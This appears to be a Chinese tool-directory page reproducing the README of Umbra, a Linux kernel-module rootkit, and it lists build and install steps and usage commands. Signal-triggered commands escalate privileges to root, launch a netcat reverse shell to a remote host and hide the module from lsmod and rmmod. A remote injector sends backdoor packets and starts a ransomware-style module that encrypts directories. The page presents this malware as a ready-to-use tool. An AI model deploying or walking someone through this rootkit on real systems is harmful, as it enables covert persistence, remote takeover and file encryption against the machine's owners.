Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Umbra — 一个针对4.x和5.x内核版本的LKM rootkit,能够打开后门,生成反向连接至远程主机的shell,启动恶意软件等。 | Kitploit
工具/GitHubGitHub/h3xduck/umbra
权限提升加密/解密工具持久化机制IDS/IPS规避后渗透利用命令与控制学习与教育Payload 开发远程访问木马
GitHubh3xduck/umbra

Umbra

一个针对4.x和5.x内核版本的LKM rootkit,能够打开后门,生成反向连接至远程主机的shell,启动恶意软件等。

136274年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra 是一个实验性的远程可控 LKM rootkit,适用于 4.x 和 5.x(最高至 5.7)内核。它通过打开网络后门,可以向远程主机发起反弹 shell、远程启动恶意软件等。

该 rootkit 仍在开发中,但以下列出的功能已完全可用。

后门运行示例

注意:此 rootkit 是在内核 5.4.0 和 Ubuntu 18.04 上开发并测试的。

功能特性

  • 🌟 后门:在收到恶意 TCP 数据包后,向远程 IP 发起反弹 shell。
  • 🌟 使用 Umbra Injector 远程控制 rootkit:
    • 远程反弹 shell。
    • 远程隐藏/显示 rootkit。
    • 启动 Umbra 模块。
  • 新增: 增加了 Umbra 模块,这是一种特殊的类恶意软件模块,可增强 Umbra 的功能,并由 Umbra Injector 远程启动。
  • 新增: Umbra 模块“勒索”,可将 Umbra 转变为远程可控的勒索软件。

勒索模块运行示例

  • Umbra 会隐藏其所有文件和目录,使其不被 ls 等用户命令看到。
  • Umbra 可以通过远程信号或本地信号隐藏/显示自身。
  • 通过发送信号 50 提升权限。
  • 模块加载时启动 netcat 反弹 shell。
  • 通过发送信号 51 向远程主机启动 netcat 反弹 shell。

更多功能将在后续更新中加入。

免责声明

此 rootkit 仅供教育目的。我对因非预期使用而造成的任何损害概不负责。

另请注意,Umbra 仅包含轻量级的隐藏和保护机制。不适用于真实场景。

重要提示: 如果您要在自己的机器上测试此 rootkit,我强烈建议使用虚拟机。

关于 Umbra 模块: 勒索模块使用简单的加密机制,但它确实会加密您机器上的任何文件夹。虽然文件可以轻松解密,但我绝对不建议对根目录或类似目录运行此模块,除非在受控环境中。

目录

  1. 构建与安装
  2. 卸载 Umbra
  3. 本地控制
  4. Umbra Injector:远程控制
  5. Umbra 模块
    • (新增) 勒索
  6. 参考资源

构建与安装

请确保您拥有 4.x 或 5.x 内核。

  1. 下载内核头文件
root@kitploit:~
apt install linux-headers-$(uname -r)
  1. 配置您的包含路径,使其覆盖内核头文件目录(通常位于 /usr/src)。如果您使用 vscode,可以查看 .vscode/c_cpp_properties.json 以了解需要包含哪些目录的示例。

  2. 克隆项目

root@kitploit:~
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. 构建 Umbra
root@kitploit:~
make
  1. 在内核中加载 Umbra 并配置环境 该脚本会将 Umbra 安装到内核中,并配置一个专门用于存放恶意软件模块的目录。该目录之后会被 rootkit 隐藏。
root@kitploit:~
sudo ./install.sh

如果您之前运行过该脚本,现在只想将 Umbra 安装到内核中,可以运行:

root@kitploit:~
sudo insmod ./umbra.ko

卸载 Umbra

确保 Umbra 未处于隐藏模式,否则卸载会失败。

root@kitploit:~
sudo rmmod umbra

基本用法:本地控制

将当前用户权限提升为 root

  • 向任意 PID 发送信号 50。
root@kitploit:~
kill -50 1

启动向 IP:PORT 的 netcat 反弹 shell

  • 在构建 rootkit 之前,在 CONFIG.H 中设置您想要的 IP 和端口。默认值为 127.0.0.1:5888

  • 在远程主机上开始监听。

root@kitploit:~
nc -lvp 5888
  • 向任意 PID 发送信号 51。Umbra 会捕获该信号并启动 shell。
root@kitploit:~
kill -51 1

注意:Umbra 也会在加载时尝试启动反弹 shell。

隐藏 rootkit - 隐身模式

这将阻止 rootkit 被 lsmod 等命令显示,以及通过 rmmod 移除。

root@kitploit:~
kill -52 1

显示 rootkit

如果隐身模式已激活,此操作将恢复到正常状态。

root@kitploit:~
kill -53 1

Umbra Injector:远程控制

通过后门获取反弹 shell

Umbra Injector 可以在 Umbra 安装之前运行(从而在安装后立即获得 shell),也可以在 Umbra 已安装到目标系统后运行。

root@kitploit:~
./injector -S 127.0.0.1

后门会监听包含以下负载的数据包: UMBRA_PAYLOAD_GET_REVERSE_SHELL

您也可以使用我的库 RawTCP 构建自己的 injector。

远程隐藏 rootkit - 隐身模式

这将阻止 rootkit 被 lsmod 等命令显示,以及通过 rmmod 移除。

root@kitploit:~
./injector -i 127.0.0.1

远程显示 rootkit

如果隐身模式已激活,此操作将恢复到正常状态。

root@kitploit:~
./injector -u 127.0.0.1

帮助

您可以通过以下命令查看运行 Umbra Injector 的完整信息:

root@kitploit:~
./injector -h

Umbra 模块

Umbra 模块将由 install.sh 脚本存放在 /tmp/umbra 目录中,Umbra 会将其隐藏。该目录不会被 ls 等命令看到。

勒索模块

此模块可通过 Umbra Injector 发起类似勒索软件的远程攻击。加密后的文件会出现 .ubr 扩展名。

目前加密机制只是一个简单的位级 NOP,作为概念验证。您可以修改模块以包含自己的加密算法。

加密一个目录及其所有子目录

root@kitploit:~
./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

解密一个目录及其所有子目录

root@kitploit:~
./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

参考资源

此 rootkit 的开发涉及大量关于 LKM 和 rootkit 技术的研究。以下是我使用的部分资源列表(不完整): 如何创建 LKM:

  • https://sysprog21.github.io/lkmpg/

Linux 系统调用参考:

  • https://syscalls64.paolostivanin.com/

一些 rootkit 参考:

  • https://xcellerator.github.io/posts/
  • https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
  • https://github.com/f0rb1dd3n/Reptile

许可证

本项目采用 GPLv2 许可证。详见 LICENSE

下载工具